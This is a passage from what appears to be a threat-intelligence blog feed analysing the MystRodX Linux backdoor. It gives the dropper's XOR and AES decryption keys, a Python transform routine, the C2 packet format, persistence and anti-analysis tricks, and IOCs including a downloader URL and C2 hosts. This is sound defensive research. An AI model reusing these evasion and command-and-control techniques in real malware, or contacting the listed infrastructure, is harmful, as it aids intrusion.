<p>We tried two patch methods: one removes the encrypted strings related to virtual machines and debuggers in the sample, while the other replaces the encrypted text with plaintext. The antivirus detection results after patching were surprising, as both patch methods effectively lowered the detection rate. However, these strings are actually unrelated to the core functionality of the sample, indicating that the community has not truly identified the MystRodX threat.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_patch.png" alt="dst_patch.png" loading="lazy"></p>
<h1 id="dropper-analysis">Dropper Analysis</h1>
<h2 id="0x1-string-decryption"><strong>0x1: String Decryption</strong></h2>
<p>MystRodX uses single-byte XOR encryption to protect sensitive strings. The decryption method is simple: the last byte of the ciphertext is the XOR key, and it is XORed byte-by-byte with the ciphertext. For example, if the ciphertext is <code>\x13\x08\x12\x04\x17\x00\x65</code>, the key is <code>0x65</code>, and after decryption, it becomes <code>vmware\x00</code>. To make analysis easier, we can use an Idapython script to batch decrypt.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_decodestring.png" alt="dst_decodestring.png" loading="lazy"></p>
<p>The results are as follows:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_strings.png" alt="dst_strings.png" loading="lazy"></p>
<p>The decrypted strings can be divided into three major categories, which are used for virtual machine detection, debugger detection, and launcher-related functions:</p>
<ul>
<li><strong>VM-related</strong>: Checks the contents of /sys/class/dmi/id/bios_vendor to see if it contains <code>vmware</code>, <code>vbox</code>, <code>Phoneix</code>, or <code>innotek</code> to determine if it is running in a virtualized environment.</li>
<li><strong>Debugger-related</strong>: Checks the parent process name for common debugging tools such as <code>gdb</code>, <code>lldb</code>, <code>ltrace</code>, <code>strace</code> to determine if the current process is being debugged.</li>
<li><strong>Launcher-related</strong>: The next stage involves the Launcher filename, PID file, and working directory.</li>
</ul>
<h2 id="0x2-payload-decryption"><strong>0x2: Payload Decryption</strong></h2>
<p>Before decrypting the Payload, a <code>keyinfo</code> structure needs to be set up in advance, where the value of <code>key1</code> is <code>0x13</code>, and the <code>xorkey</code> is hardcoded in the sample with a length of 32 bytes.</p>
<pre><code class="language-c">struct keyinfo {
    uint8_t key1;
    uint8_t unknow[3];
    void *xorkey;
    uint16_t xorkey_len;
    uint8_t key2;
    uint8_t notused;
};
</code></pre>
<p>The <code>xorkey</code> is as follows:</p>
<pre><code>00000000  02 06 03 09 04 02 0e 0a 01 0f 08 0a 04 0d 0b 09  |................|
00000010  0a 09 01 03 06 05 6d 0c 01 02 0f 03 03 0a 05 00  |......m.........|
</code></pre>
<p>The value of <code>key2</code> is computed using a checksum-like algorithm on the <code>xorkey</code>, which in this case is <code>0x90</code>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_checksum.png" alt="dst_checksum.png" loading="lazy"></p>
<p>After obtaining <code>key1</code>, <code>xorkey</code>, and <code>key2</code>, the following code snippet is used to decrypt the Payload. It can be observed that the last byte of the Payload is also a key. This algorithm, known as <code>MystRodX_Transform</code>, is repeated across multiple scenarios in MystRodX, such as AES key decryption, trigger packet decryption, etc.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_payload.png" alt="dst_payload.png" loading="lazy"></p>
<p>After analysis, we implemented the algorithm in Python, as detailed in the &quot;Transform Algorithm&quot; section of the Appendix. In actual use, you only need to provide <code>magic</code>, <code>magic2</code>, and <code>key</code>. For example, to decrypt the Payload, <code>magic</code> is <code>key1</code> (0x13), <code>magic2</code> is the last byte of the Payload (0xab), and <code>key</code> is <code>key_for_dropper</code>.</p>
<p>The decrypted Payload contains three critical files: <code>chargen</code>, <code>busybox</code>, and <code>daytime</code>. Among them, <code>daytime</code> is the Launcher component responsible for launching <code>chargen</code>, which is the core MystRodX backdoor component. The Payload&apos;s verification mechanism relies on a 7-byte checksum value: <code>C2 0A D7 A4 22 21 5A</code>. The Dropper compares this value and only releases the Launcher and MystRodX backdoor if the checksum matches.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_decryptpayload.png" alt="dst_decryptpayload.png" loading="lazy"></p>
<h1 id="launcher-analysis"><strong>Launcher Analysis</strong></h1>
<p>The Launcher uses the same string encryption algorithm. The decrypted <code>clog</code> and <code>dlog</code> are used to store the process IDs (PIDs) of the MystRodX and Launcher. Its core function is to continuously monitor the status of the MystRodX backdoor process, <code>chargen</code>. If <code>chargen</code> is not running, the Launcher will restart the backdoor process.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_launcher-1.png" alt="dst_launcher.png" loading="lazy"></p>
<h1 id="mystrodx-backdoor-analysis"><strong>MystRodX Backdoor Analysis</strong></h1>
<p>MystRodX is a typical backdoor implemented in C++. The class names in the sample clearly reveal the functions it supports, such as file management, reverse shell, SOCKS proxy, port forwarding, etc.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_class.png" alt="dst_class.png" loading="lazy"></p>
<p>Due to space limitations, this article will not delve into the common functions but will focus on analyzing the distinctive features of MystRodX from two aspects: <strong>host behavior</strong> and <strong>network protocols</strong>, including:</p>
<ul>
<li><strong>Dual-process Guardian Mechanism</strong></li>
<li><strong>Configuration Decryption</strong></li>
<li><strong>Communication Protocol</strong></li>
<li><strong>Passive Backdoor Mode</strong></li>
</ul>
<h2 id="0x1-dual-process-guardian-mechanism"><strong>0x1: Dual-process Guardian Mechanism</strong></h2>
<p>MystRodX continuously monitors the <code>daytime</code> process. If <code>daytime</code> is not running, MystRodX will immediately launch the Launcher process again. This way, the Launcher and MystRodX form a dual-process guardian mechanism: if either process terminates, the other will restart it, ensuring long-term stable operation.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_proclaunch.png" alt="dst_proclaunch.png" loading="lazy"></p>
<h2 id="0x2-configuration-decryption"><strong>0x2: Configuration Decryption</strong></h2>
<p>MystRodX&#x2019;s configuration is encrypted using AES. The AES key, like the Payload, is protected by the Transform algorithm, except that the values of <code>key1</code>, <code>xorkey</code>, and <code>key2</code> differ.</p>
<pre><code>key1:0xd

xorkey
00000000  00 02 07 11 13 19 04 06 16 0e 18 0b 02 2d 0b 19  |.............-..|
00000010  a0 91 02 23 96 45 6c 1c b1 d2 7f e3 22 00 00 00  | ..#.El.&#xB1;&#xD2;.&#xE3;&quot;...|

key2:0xf1
</code></pre>
<p>Below are the AES-related ciphertext and the decrypted plaintext. The AES key starts at offset <code>0x08</code> in the plaintext and has a length of 32 bytes.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_aeskey.png" alt="dst_aeskey.png" loading="lazy"></p>
<p>Using the above AES key and a hardcoded IV <code>0D 0F 02 04 08 07 2D 1C 01 04 0D 01 02 07 06 02</code>, you can decrypt the configuration using CBC mode. Readers can refer to the <strong>CyberChef section in the Appendix</strong> for more details.</p>
<p>The configuration of the sample <code>72d377fa8ccf23998dd7c22c9647fc2a are</code> shown below:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_config.png" alt="dst_config.png" loading="lazy"></p>
<p>The decryption process for the configuration of <code>a46f2c771fb580e2135ab898731be9a7</code> is the same; only the key differs.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_config_cfr.png" alt="dst_config_cfr.png" loading="lazy"></p>
<p>The configuration includes information such as the activity name, time, C2 server, port, public keys, and more. The table below lists each attribute and its offset in the configuration (note: the configuration may vary depending on the sample):</p>
<table>
<thead>
<tr>
<th>Offset</th>
<th>Field</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x00</td>
<td>Campaign</td>
</tr>
<tr>
<td>0x08</td>
<td>Backdoor Type</td>
</tr>
<tr>
<td>0x0c</td>
<td>MainC2 Port</td>
</tr>
<tr>
<td>0x10</td>
<td>BackupC2 Port</td>
</tr>
<tr>
<td>0x1c</td>
<td>Interval</td>
</tr>
<tr>
<td>0x24</td>
<td>Effective date</td>
</tr>
<tr>
<td>0x78</td>
<td>Main C2</td>
</tr>
<tr>
<td>0x178</td>
<td>Backup C2</td>
</tr>
<tr>
<td>0x278</td>
<td>Public Key</td>
</tr>
</tbody>
</table>
<p>When the Backdoor Type is set to 1, MystRodX enters passive backdoor mode and waits for an activation message. When the value of Backdoor Type is not 1, MystRodX enters active backdoor mode and establishes communication with the C2 specified in the configuration, waiting to execute the received commands. In the two samples captured so far, the value of Backdoor Type is 0.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_choice.png" alt="dst_choice.png" loading="lazy"></p>
<h2 id="0x3-network-communication"><strong>0x3: Network Communication</strong></h2>
<p>The MystRodX backdoor supports two communication modes: <strong>TCP</strong> and <strong>HTTP</strong>, and it can be configured to enable or disable AES encryption. The currently captured samples all use the <strong>TCP</strong> mode and have encryption disabled. The network packet format is as follows:<code>Packet Length (4 bytes) + Main Code (4 bytes) + Sub Code (4 bytes) + Packet Direction (4 bytes) + Data</code></p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_packet.png" alt="dst_packet.png" loading="lazy"></p>
<p>For example, the packet <code>10 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00</code> indicates that the packet is sent from the BOT to the C2, with a length of 16 bytes. The <strong>Main Code</strong> and <strong>Sub Code</strong> are both <code>1</code>, which corresponds to the online message of MystRodX.</p>
<pre><code>Little Endian 
10 00 00 00  ---&gt; Packet length, 0x10 bytes
01 00 00 00  ---&gt; Main Code, 0x01
01 00 00 00  ---&gt; Sub Code, 0x01 
01 00 00 00  ---&gt; Direction, 0x01, bot_to_c2
</code></pre>
<p>The <strong>Main Code</strong> in the protocol can have the following values: <code>1</code>, <code>2</code>, <code>5</code>, <code>7</code>, and <code>8</code>. Among them, <code>2</code>, <code>5</code>, <code>7</code>, and <code>8</code> correspond to <strong>reverse shell</strong>, <strong>file management</strong>, <strong>port forwarding</strong>, and <strong>SOCKS management</strong> functionalities, respectively.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_maincode.png" alt="dst_maincode.png" loading="lazy"></p>
<p><strong>1</strong> represents <strong>general management functions</strong>, primarily used by the C2 for controlling the bot, such as updating configuration files, uploading device information, etc. These operations are assigned different <strong>Sub Codes</strong>. The table below lists the <strong>Sub Codes</strong> and their corresponding functions.</p>
<table>
<thead>
<tr>
<th>SubCode</th>
<th>Function</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Beacon</td>
</tr>
<tr>
<td>2</td>
<td>Uplaod DeviceInfo</td>
</tr>
<tr>
<td>4</td>
<td>Heartbeat</td>
</tr>
<tr>
<td>7</td>
<td>Enable Traffic encryption</td>
</tr>
<tr>
<td>14</td>
<td>Set a new interval</td>
</tr>
<tr>
<td>15</td>
<td>Update Configuration</td>
</tr>
<tr>
<td>16</td>
<td>Teardown</td>
</tr>
<tr>
<td>19</td>
<td>Upload TimeInfo</td>
</tr>
</tbody>
</table>
<p>For example, when the bot receives a command with MainCode 1 and SubCode 2, it will report the device information back to the C2.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_deviceinfo.png" alt="dst_deviceinfo.png" loading="lazy"><br>
Additionally, it is worth mentioning that when traffic encryption is enabled, the network packet format changes and is upgraded to the following structure:<code>CipherText Length(4bytes)+ PlainText Length(4bytes) + padding(8bytes) + CipherText</code>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/08/dst_ciphertxt.png" alt="dst_ciphertxt.png" loading="lazy"></p>
<h1 id="summary">Summary</h1>
<p>With this, our analysis of MystRodX comes to a temporary close. The above information represents all the relevant intelligence currently available. Network administrators can refer to the technical details in this analysis to assess whether their systems have been compromised by this backdoor.</p>
<p>Due to limited visibility, we currently do not know the specific infiltration vectors, attack targets, or the true intentions of MystRodX. We sincerely welcome industry partners who possess further information to share intelligence with us, so that we can work together to enhance cybersecurity defenses.</p>
<p>If you are interested in our research or have any information related to this backdoor, feel free to contact us via the <a href="https://x.com/Xlab_qax?ref=blog.xlab.qianxin.com">X platform</a>.</p>
<h1 id="ioc">IOC</h1>
<h2 id="downloader">Downloader</h2>
<pre><code>http://139.84.156[.]79/dst-x86.bin

</code></pre>
<h2 id="c2-campaign">C2 &amp; Campaign</h2>
<pre><code>airtel.vpndns.net:443   neybquno
149.28.130.195:443    zoufkcfr

149.28.137.254:8010   neybquno
149.28.137.254:8443   zoufkcfr


156.244.6.68:443    unknown
185.22.153.228:443  unknown
</code></pre>
<h2 id="sample-md5">Sample MD5</h2>
<pre><code>Dropper
5e3a2a0461c7888d0361dd75617051c6 *dst
72d377fa8ccf23998dd7c22c9647fc2a *chargen
5bf67ce1b245934965557de6d37f286f *daytime


fa3b4d5fd1f6c995395244f36c18ffec *dst
a46f2c771fb580e2135ab898731be9a7 *chargen
e8fcb7f3f0edfc7d1a99918dc14527d1 *daytime
1f003437e3d10e07f5ee5f51c61c548f *networkd

Patched By Xlab
4dc20d1177da7932be3d63efe939b320
2775d9eac1c4a5eb2c45453d63ea6379
4db35e708c2d0cabe4709fa0540bafb7
</code></pre>
<h2 id="public-key">Public Key</h2>
<h3 id="neybquno">neybquno</h3>
<pre><code>-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAs7/nw8KnB3Ow2uUR1bNW
60UQKOI7emuau8AyCK4KqK/iUGQJzOoopLgi2D4DWrK5Wi+qtgLPt7WSTFUnMGge
XRbXdHamEasF/8kNhuv7F/CKSc+sCy/TrtLeYAQH4nuT+PhMym0aOLEwSJIuDu+4
wgUzONdgpkZZnx2h8TQmzv3LmeQWx1iOk+L4SrwbG3Cs889eWlj2O66hyT5kz6s5
6HxRjZD4V1zuWzcuoNpdqaKKA4DaraF4onYNNctIiSdkaTKPeJaim+whljmuFn8Q
y9WKcT2yogoUaUd3fkx+MPaK80R6nIEN+ooreBkf2eXXJwuTRFl1eocaUENENo5h
QwIDAQAB
-----END PUBLIC KEY-----
</code></pre>
<h3 id="zoufkcfr">zoufkcfr</h3>
<pre><code>-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5blT2R1XzP3T0Eu0vatg
u8h15ysd+TYQWYCrm1LT9bISVx9Jhzhbf3l5oFQD/TBstZQ6hjhUZuDCczdaYZJu
4HVzhkmVKsyjLV16aG5mCbDiF/bR879jSDJMZoqZJOitAA0xQQ2FqmuOxlFkN8Ab
Rd87xcDTF/SzWcV2nj6UlNHcFilxz48kai3/lcypnIoUtnEMtkMGsRX81LVniyUm
yrvvRAA7PQqHa1qFbJSt3xY+FAzC/Iy6QbSnrMoc8FVMCDUR/YKLCDU2c3SUshUs
Xkanh6odvXOBjEKoEbaBgc3Bb2uAPdiDkEGqDiZl0yitzopA9+f+606Q5UG9CVcW
OwIDAQAB
-----END PUBLIC KEY-----
</code></pre>
<h1 id="appendix">Appendix</h1>
<h2 id="transform-algorithm">Transform Algorithm</h2>
<pre><code>key_for_dropper=bytes.fromhex(&apos;02 06 03 09 04 02 0e 0a 01 0f 08 0a 04 0d 0b 09
0a 09 01 03 06 05 6d 0c 01 02 0f 03 03 0a 05 00&apos;)


key_for_backdoor=bytes.fromhex(&apos;00 02 07 11 13 19 04 06 16 0E 18 0B 02 2D 0B 19
A0 91 02 23 96 45 6C 1C B1 D2 7F E3 22 00 00 00&apos;)


def calc_sum(buf):
    checksum = 0
    for i, v in enumerate(key):
        checksum ^= (v &lt;&lt; (i&amp;7)) &amp; 0xFF  
    return checksum  
    

def transform(magic,magic2,buf,key):
    
    buf_len=len(buf)-1
    key_len=len(key)
    key1=magic ^ calc_sum(key)
    
    key2=(key[(key1^buf_len)%key_len]) ^ magic2 ^ buf_len
    out=bytearray()
    for i, value in enumerate(buf):
        out.append((key[(i^key1)%key_len] ^ key2 ^ value ^ i)&amp;0xff)

    return out
</code></pre>
<h2 id="cyberchef">CyberChef</h2>
<pre><code>https://gchq.github.io/CyberChef/#recipe=AES_Decrypt(%7B&apos;option&apos;:&apos;UTF8&apos;,&apos;string&apos;:&apos;z7bcjTSKrFiHYUB63NZendVvtJ2RGfo8&apos;%7D,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;0d%200f%2002%2004%2008%2007%202d%201c%2001%2004%200d%2001%2002%2007%2006%2002&apos;%7D,&apos;CBC&apos;,&apos;Raw&apos;,&apos;Raw&apos;,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;&apos;%7D,%7B&apos;option&apos;:&apos;Hex&apos;,&apos;string&apos;:&apos;&apos;%7D)To_Hexdump(16,false,false,false)&amp;input=PBpcVtR8VHCFl/oaqAGk0w7pCVMMe1xQ1Ma0FBs2X2P9vpD6GrVC/b6XqKDWb/eFS/g9najMHOO3r38h3V9lZvvSKl31GM2FJbIKw91n/r6Z9TgKmrlLdLroahpV91HmQPi2ttGAyXrF9SmsLMCBqA6X5fIPZ/v3cEI69nKREj1Fq%2BHffi6q4s3sfzgDmFDZL9XFff9g2AtSVm7MLBAhNjMXqifFPxIbo5L0McZ%2B%2B78Wrdv3VnsvZIZTBLLM%2BEY/EqiKf73OIvmRGrI3Q4ksiGyG8CTcau6hrlJUN91IWdSjRU0vNPxvwIU4qy9aTSKhTI2Be2Cc53B3aRu%2BGKMcFG0d/IioT0fb1MxeIMPKtPViBzHRRj0OGbK5OFpX0nfdTyAEW85fnXos14I6yO7%2B/JfsaF4YQv7OVCKgQnYXFrjMMajtE%2BoiGInB6d4ybrNNXA3u3p%2BQ3leErM8yuIpvzSre6wPsyJ4VZxyPQA4iRn1AnZO7QA5UG2IzqPCXZfAvLHhvMqMNI9D8bwInx1pnVdx2kwHQhxvyzLGFxkVrhvTcZSGSG708jkAYfzjItoPANBc0WMg0NWuSs53gVmuc/UJk%2BvEiZTjHayg4o1yLANpPtRTfmIMcLfSRIw2BCdthqmPLwx8L46rvUycpHvL3Nb7vl9Uwr12%2BqRjMQj5aaLg4veTaOnRCSJTjVq9aRrzjZutk1hb9CiS/JigJYJoxhCnZ82ZpTIzrjMR8RjES5UX9%2B9/3xkARRcAunSTQP8SZiPVuMOXTHyKB8nr7NsfoUeQ1ixisswp7E3FOqmel92N2CdmrifZzdD3KmnPubHhM5OIX7x0X9004py1zlMSZCAPPLvrCxLpBwqkmuxNjlW7Qz6FKMgXoiwucVrYUzj3rWPBpENrqBAkWvKR3c9Y6dKzTmOPT/CRsEvdbe/l5MWmg5n7vog0TOR3TQpaDRBVC6HMsCSIS/NG0lteKVEevZQDQvSqtWbjMneAUvQ8RLEl8e7CDAQN7xfmQpdRVbaqUtD7hzvz9pfsHgWCG5g0lMkYA6NQFtfyH98/DwB/Jo5fmUANQZGu8XJ6pDF7KSqbqKDxk2EzVNK7po3llMavonwq9JxHk8xoywqGhNoKLWbFlatzFx6fTqn%2BtLZBZcYzb/csSzWeq9t3ireaZw3EJGaxOX09YvlTZbCMIyIEed17qkdNbufSJ4hPWsLHzmnihehvy1xOPlmVX%2BjLnBHRX5mNgVdWednIL0duHduvvCOejxcn5QFTwaspWfeSXYXlNoMFrVfCvrv%2BscinLs2OvtUlBV3mijU2pnE0tmTn%2BZqpYCeht5cWA5VAPbz63mOEIAl9%2BNcYsrUAaZf51jiyzhBI%2BW0pH5kATshWsI0Ltl6rThYzCOYdgzaSRDEjOw/dNqJdK2k8Ut4t5uUvcgw4oryOrhQOJVaVcGX%2BvRVnwYzfeF5ryWFbfvlVp661XNlA7
</code></pre>
]]></content:encoded></item><item><title><![CDATA[静默之控：主动与被动双模后门MystRodX的隐匿渗透]]></title><description><![CDATA[<h1 id="%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D">&#x80CC;&#x666F;&#x4ECB;&#x7ECD;</h1>
<p>2025&#x5E74;6&#x6708;6&#x65E5;&#xFF0C;Xlab&#x5927;&#x7F51;&#x5A01;&#x80C1;&#x611F;&#x77E5;&#x7CFB;&#x7EDF;&#x76D1;&#x6D4B;&#x5230; IP 139.84.156.79&#x6B63;&#x5728;&#x4F20;&#x64AD;&#x4E00;&#x4E2A;VT&#x4F4E;&#x68C0;&#x6D4B; 4/65&#xFF0C;&#x540D;&#x4E3A;dst86.bin&#x7684;&#x53EF;&#x7591;ELF&#x6587;</p>]]></description><link>https://blog.xlab.qianxin.com/mystrodx_covert_dual-mode_backdoor/</link><guid isPermaLink="false">689b51cf428efe0001a248b1</guid><category><![CDATA[APT]]></category><category><![CDATA[Backdoor]]></category><category><![CDATA[Traffic Signaling]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Wed, 27 Aug 2025 03:11:27 GMT</pubDate><content:encoded><![CDATA[<h1 id="%E8%83%8C%E6%99%AF%E4%BB%8B%E7%BB%8D">&#x80CC;&#x666F;&#x4ECB;&#x7ECD;</h1>
<p>2025&#x5E74;6&#x6708;6&#x65E5;&#xFF0C;Xlab&#x5927;&#x7F51;&#x5A01;&#x80C1;&#x611F;&#x77E5;&#x7CFB;&#x7EDF;&#x76D1;&#x6D4B;&#x5230; IP 139.84.156.79&#x6B63;&#x5728;&#x4F20;&#x64AD;&#x4E00;&#x4E2A;VT&#x4F4E;&#x68C0;&#x6D4B; 4/65&#xFF0C;&#x540D;&#x4E3A;dst86.bin&#x7684;&#x53EF;&#x7591;ELF&#x6587;&#x4EF6;&#x3002;<code>&#x591A;&#x5F15;&#x64CE;&#x68C0;&#x6D4B;&#x6A21;&#x5757;</code>&#x5C06;&#x8BE5;&#x6587;&#x4EF6;&#x6807;&#x8BC6;&#x4E3A;MIRAI&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#xFF0C;&#x4F46;<code>AI&#x7814;&#x5224;&#x6A21;&#x5757;</code>&#x5374;&#x6CA1;&#x6709;&#x7ED9;&#x51FA;&#x76F8;&#x5E94;&#x7684;&#x7ED3;&#x679C;&#x3002;&#x8FD9;&#x4E2A;&#x201C;&#x5F02;&#x5E38;&#x201D;&#x5F15;&#x8D77;&#x4E86;&#x6211;&#x4EEC;&#x7684;&#x5174;&#x8DA3;&#xFF0C;&#x7ECF;&#x8FC7;&#x5206;&#x6790;&#x786E;&#x8BA4;&#x5B83;&#x662F;Dropper&#xFF0C;&#x6700;&#x7EC8;&#x4F1A;&#x91CA;&#x653E;&#x51FA;&#x4E00;&#x4E2A;&#x5168;&#x65B0;&#x7684;&#x540E;&#x95E8;&#x6728;&#x9A6C;&#xFF0C;&#x548C;Mirai&#x5B8C;&#x5168;&#x65E0;&#x5173;&#xFF0C;&#x591A;&#x5BB6;&#x6740;&#x8F6F;&#x5C06;&#x5176;&#x6807;&#x8BB0;&#x4E3A;Mirai&#x662F;&#x4E0D;&#x51C6;&#x786E;&#x7684;&#x3002;&#x57FA;&#x4E8E;&#x5176;&#x4F20;&#x50E0;&#x4E2D;&#x4F7F;&#x7528;&#x7684;&#x6587;&#x4EF6;&#x540D;dst&#xFF0C;&#x91CA;&#x653E;&#x6837;&#x672C;&#x4E2D;&#x7684;&#x7C7B;&#x540D;cmy_&#xFF0C;&#x591A;&#x79CD;&#x5F62;&#x5F0F;&#x7684;Xor&#x7B97;&#x6CD5;&#xFF0C;&#x6211;&#x4EEC;&#x5C06;&#x5B83;&#x547D;&#x540D;&#x4E3A;MystRodX&#x3002;</p>
<p>MystRodX&#x662F;&#x4E00;&#x4E2A;&#x7531;c++&#x8BED;&#x8A00;&#x5B9E;&#x73B0;&#x7684;&#x5178;&#x578B;&#x540E;&#x95E8;&#x6728;&#x9A6C;&#xFF0C;&#x652F;&#x6301;&#x6587;&#x4EF6;&#x7BA1;&#x7406;&#xFF0C;&#x7AEF;&#x53E3;&#x8F6C;&#x53D1;&#xFF0C;&#x53CD;&#x5F39;SHELL&#xFF0C;sockets&#x7BA1;&#x7406;&#x7B49;&#x529F;&#x80FD;&#x3002;&#x76F8;&#x8F83;&#x4E8E;&#x4E00;&#x822C;&#x7684;&#x540E;&#x95E8;&#xFF0C;MystRodX&#x5728;&#x9690;&#x533F;&#x6027;&#xFF0C;&#x7075;&#x6D3B;&#x6027;&#x4FE9;&#x65B9;&#x9762;&#x5177;&#x6709;&#x975E;&#x5E38;&#x9C9C;&#x660E;&#x7684;&#x7279;&#x70B9;&#x3002;&#x5176;&#x4E2D;<code>&#x9690;&#x533F;&#x6027;</code>&#x4F53;&#x73B0;&#x5728;&#x5BF9;&#x4E8E;&#x4E0D;&#x540C;&#x7EA7;&#x522B;&#x654F;&#x611F;&#x4FE1;&#x606F;&#x91C7;&#x7528;&#x4E86;&#x5DEE;&#x5F02;&#x5316;&#x52A0;&#x5BC6;&#x7B56;&#x7565;&#xFF1A;</p>
<ol>
<li>&#x865A;&#x62DF;&#x673A;&amp;&#x8C03;&#x8BD5;&#x5668;&#x68C0;&#x6D4B;&#x7B49;&#x76F8;&#x5173;&#x654F;&#x611F;&#x5B57;&#x7B26;&#x4E32;&#x4F7F;&#x7528;&#x5355;&#x5B57;&#x8282;xor&#x52A0;&#x5BC6;</li>
<li>AES&#x5BC6;&#x94A5;&#xFF0C;Payload&#xFF0C;&#x6FC0;&#x6D3B;&#x62A5;&#x6587;&#x4F7F;&#x7528;&#x81EA;&#x5B9A;&#x4E49;&#x7684;Transform&#x7B97;&#x6CD5;&#x52A0;&#x5BC6;</li>
<li>&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#x4F7F;&#x7528;AES CBC&#x6A21;&#x5F0F;&#x52A0;&#x5BC6;</li>
</ol>
<p>&#x800C;<code>&#x7075;&#x6D3B;&#x6027;</code>&#x5219;&#x662F;MystRodX&#x4F1A;&#x6839;&#x636E;&#x4E0D;&#x540C;&#x7684;&#x914D;&#x7F6E;&#x52A8;&#x6001;&#x5F00;&#x542F;&#x4E0D;&#x540C;&#x7684;&#x529F;&#x80FD;&#x7279;&#x6027;&#xFF0C;&#x6BD4;&#x5982;&#x7F51;&#x7EDC;&#x534F;&#x8BAE;&#x4F7F;&#x7528;TCP&#x6216;HTTP&#xFF0C;&#x6D41;&#x91CF;&#x76F4;&#x63A5;&#x4F7F;&#x7528;&#x660E;&#x6587;&#x6216;AES&#x52A0;&#x5BC6;&#x7B49;&#x3002;&#x5176;&#x4E2D;&#x6700;&#x6709;&#x610F;&#x601D;&#x7684;&#x662F;&#x652F;&#x6301;&#x88AB;&#x52A8;&#x5524;&#x9192;&#x7684;&#x89E6;&#x53D1;&#x6A21;&#x5F0F;&#xFF0C;<strong>&#x5373;MystRodX&#x53EF;&#x914D;&#x7F6E;&#x6210;&#x88AB;&#x52A8;&#x5F0F;&#x540E;&#x95E8;&#xFF0C;&#x5728;&#x4E0D;&#x4F7F;&#x7528;&#x5F00;&#x653E;&#x7AEF;&#x53E3;&#x7684;&#x60C5;&#x51B5;&#x4E0B;&#x7531;&#x7279;&#x5B9A;&#x7684;DNS&#x6216;ICMP&#x7F51;&#x7EDC;&#x62A5;&#x6587;&#x6FC0;&#x6D3B;</strong>&#x3002;</p>
<p>MystRodX&#x7684;&#x914D;&#x7F6E;&#x4E2D;&#x5B58;&#x5728;&#x4E00;&#x9879;&#x7528;&#x4E8E;&#x8BBE;&#x5B9A;&#x540E;&#x95E8;&#x751F;&#x6548;&#x65F6;&#x95F4;&#x7684;&#x9009;&#x9879;&#x3002;&#x5728;&#x5DF2;&#x6355;&#x83B7;&#x7684;&#x6837;&#x672C;&#x4E2D;&#xFF0C;&#x8BE5;&#x9009;&#x9879;&#x6240;&#x8BBE;&#x7F6E;&#x7684;&#x6700;&#x65E9;&#x65F6;&#x95F4;&#x4E3A;<code>2024&#x5E74;01&#x6708;07&#x65E5; 23:10:20</code>&#xFF0C;&#x8868;&#x660E;&#x8BE5;&#x540E;&#x95E8;&#x5728;&#x771F;&#x5B9E;&#x7F51;&#x7EDC;&#x4E2D;&#x5DF2;&#x6F5C;&#x4F0F;&#x8D85;&#x8FC7;20&#x4E2A;&#x6708;&#xFF0C;&#x4E14;&#x4E00;&#x76F4;&#x672A;&#x88AB;&#x5B89;&#x5168;&#x793E;&#x533A;&#x51C6;&#x786E;&#x8BC6;&#x522B;&#x3002;&#x6B64;&#x5916;&#xFF0C;&#x57FA;&#x4E8E;<strong>&#x5947;&#x5B89;&#x4FE1;&#x7F51;&#x7EDC;&#x7A7A;&#x95F4;&#x6D4B;&#x7ED8;&#x9E70;&#x56FE;&#x5E73;&#x53F0;&#x7684;C2&#x63A2;&#x6D4B;&#x670D;&#x52A1;</strong>&#xFF0C;&#x53D1;&#x73B0;&#x4E86;3&#x4E2A;&#x4ECD;&#x5728;&#x6D3B;&#x8DC3;&#x7684;C2&#x670D;&#x52A1;&#x5668;&#xFF0C;&#x5E76;&#x4EE5;&#x6280;&#x672F;&#x624B;&#x6BB5;&#x786E;&#x8BA4;&#x5728;&#x91CE;&#x8FD8;&#x5B58;&#x5728;&#x672A;&#x88AB;&#x6355;&#x83B7;&#x7684;&#x6837;&#x672C;&#x3002;&#x518D;&#x8003;&#x8651;&#x5230;&#x8BE5;&#x540E;&#x95E8;&#x6240;&#x91C7;&#x7528;&#x7684;&#x88AB;&#x52A8;&#x901A;&#x4FE1;&#x673A;&#x5236;&#x6240;&#x5E26;&#x6765;&#x7684;&#x9AD8;&#x9690;&#x853D;&#x7279;&#x6027;&#xFF0C;&#x6211;&#x4EEC;&#x51B3;&#x5B9A;&#x64B0;&#x5199;&#x672C;&#x6587;&#xFF0C;&#x516C;&#x5F00;&#x76F8;&#x5173;&#x7814;&#x7A76;&#x6210;&#x679C;&#xFF0C;&#x4EE5;&#x63ED;&#x793A;&#x8FD9;&#x4E00;&#x957F;&#x671F;&#x5B58;&#x5728;&#x7684;&#x5A01;&#x80C1;&#xFF0C;&#x4E3A;&#x589E;&#x5F3A;&#x7F51;&#x7EDC;&#x5B89;&#x5168;&#x9632;&#x5FA1;&#x80FD;&#x529B;&#x63D0;&#x4F9B;